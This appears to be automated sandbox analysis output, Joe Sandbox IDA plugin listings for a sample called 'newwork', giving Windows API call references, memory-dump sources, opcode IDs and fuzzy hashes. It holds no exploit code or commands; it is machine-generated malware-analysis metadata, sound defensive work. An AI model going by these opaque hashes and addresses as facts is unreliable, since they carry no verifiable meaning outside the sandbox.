                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ThreadWindow$CurrentEnableEnumPathPrepareWindowsWrite
                                                                                • String ID:
                                                                                • API String ID: 3319771486-0
                                                                                • Opcode ID: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                • Instruction ID: eef1953176fed27c4f60a3b97998f4e8fb1447464a393d6256780c84e8a913cd
                                                                                • Opcode Fuzzy Hash: 0af19ab3550c8734ef4e1cf2f84aef4c41dad365f35295dd8d2c2646a272cfa9
                                                                                • Instruction Fuzzy Hash: 5AF0B471248300BFE705DF62ECA6B35B6E8D748714F61047BF40886590E97D5844D51E
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                • Instruction ID: 51b66c86ab1fb2ed9abdb0db83839a26410808368eb32e0cb4295e2ee82716ff
                                                                                • Opcode Fuzzy Hash: d61e7892e696cd19dbec5936e1f60c0eb1c4f94c101f5f53d8ed807e2bb541d1
                                                                                • Instruction Fuzzy Hash: 09F04970608109EBBB1CCF58D0618AF7BA0EB48300F2080AFE907C7BA0D634AA80D658
                                                                                APIs
                                                                                • CreateWindowExA.USER32(?,?,?,?,?,?,?,?,?,00000000,00400000,?), ref: 00416585
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                • Instruction ID: 158b8484bb218b41c698b3aa21f26e2dd86497bc01e640ef524e7c8f4c0ee3c6
                                                                                • Opcode Fuzzy Hash: b152e844846ae8a52721441d180559fdf16f7956a15d86c9ff4cf0dcda8b9698
                                                                                • Instruction Fuzzy Hash: 4BF019B2200510AFDB84DE9CD9C0F9773ECEB0C210B0481A6FA08CB21AD220EC108BB0
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(?,?), ref: 004149EF
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                • Instruction ID: 59ac3629b8f45f7a6bca1b57e2bf54285868c68ba6336e642f1ef9b7bb8d2b05
                                                                                • Opcode Fuzzy Hash: 9e73aedc2ede48524128b4fba7c94cddd86b5e43f4b9cee2e76a3e9f018a4363
                                                                                • Instruction Fuzzy Hash: B2F0DA762042019FC740DF6CC8C488A77E5FF89255B5546A9F989CB356C731EC54CB91
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,?,?,00000000,?,00000080,00000000), ref: 00450804
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID:
                                                                                • API String ID: 823142352-0
                                                                                • Opcode ID: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                • Instruction ID: 52eb814c7c241dc182afdc6c3e242d4e4c9a4e6d94000e289351c80ae23ff87c
                                                                                • Opcode Fuzzy Hash: ce99838f7be0491c6923214398908b2fd93372403a84c7b432a549debe4dc153
                                                                                • Instruction Fuzzy Hash: 53E012B53541483EE780EEAD6C42F9777DC971A714F008037B998D7341D461DD158BA8
                                                                                APIs
                                                                                • GetFileAttributesA.KERNEL32(00000000,00000000,0042CD14,?,00000001,?,?,00000000,?,0042CD66,00000000,00452A25,00000000,00452A46,?,00000000), ref: 0042CCF7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AttributesFile
                                                                                • String ID:
                                                                                • API String ID: 3188754299-0
                                                                                • Opcode ID: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                • Instruction ID: d3c11148bbbe1678040d416a6bc301cfea82702c80b798926358c5e84281cc0e
                                                                                • Opcode Fuzzy Hash: 2e3447488e8940f063bbcfc4a9008e9bc81ad59ac090e4e62a8f5aa92ecca264
                                                                                • Instruction Fuzzy Hash: 80E065B1304304BFD701EB66EC92A5EBAACDB49754BA14876B50097592D5B86E008468
                                                                                APIs
                                                                                • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00453273,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E8E7
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FormatMessage
                                                                                • String ID:
                                                                                • API String ID: 1306739567-0
                                                                                • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                APIs
                                                                                • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ExtentPointText
                                                                                • String ID:
                                                                                • API String ID: 566491939-0
                                                                                • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                APIs
                                                                                • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateWindow
                                                                                • String ID:
                                                                                • API String ID: 716092398-0
                                                                                • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                APIs
                                                                                • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Create
                                                                                • String ID:
                                                                                • API String ID: 2289755597-0
                                                                                • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                APIs
                                                                                • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseFind
                                                                                • String ID:
                                                                                • API String ID: 1863332320-0
                                                                                • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                APIs
                                                                                • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CallbackDispatcherUser
                                                                                • String ID:
                                                                                • API String ID: 2492992576-0
                                                                                • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                APIs
                                                                                • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID:
                                                                                • API String ID: 3934441357-0
                                                                                • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
APIs
  • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
• ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
  • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
Memory Dump Source
• Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Similarity
• API ID: InfoParametersSystem$ShowWindow
• String ID:
• API String ID: 3202724764-0
APIs
• SetWindowTextA.USER32(?,00000000), ref: 004242DC
Similarity
• API ID: TextWindow
• String ID:
• API String ID: 530164218-0
APIs
• KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
Similarity
• API ID: CallbackDispatcherUser
• String ID:
• API String ID: 2492992576-0
APIs
• GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
  • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
Similarity
• API ID: ErrorFileLast
• String ID:
• API String ID: 734332943-0
APIs
• SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
Similarity
• API ID: CurrentDirectory
• String ID:
• API String ID: 1611563598-0
APIs
• SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
APIs
Similarity
• API ID: DestroyWindow
• String ID:
• API String ID: 3375834691-0
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
APIs
• GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(?,?,00004000,?,?,?,?,?,00401973), ref: 00401766
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 1263568516-0
                                                                                • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                                                • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                                                • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle
                                                                                • String ID:
                                                                                • API String ID: 2962429428-0
                                                                                • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                • Instruction Fuzzy Hash:
                                                                                APIs
                                                                                • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                 • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                 • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                • API String ID: 2323315520-3614243559
                                                                                • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0045862F
                                                                                • QueryPerformanceCounter.KERNEL32(021A3858,00000000,004588C2,?,?,021A3858,00000000,?,00458FBE,?,021A3858,00000000), ref: 00458638
                                                                                • GetSystemTimeAsFileTime.KERNEL32(021A3858,021A3858), ref: 00458642
                                                                                • GetCurrentProcessId.KERNEL32(?,021A3858,00000000,004588C2,?,?,021A3858,00000000,?,00458FBE,?,021A3858,00000000), ref: 0045864B
                                                                                • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,021A3858,021A3858), ref: 004586CF
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
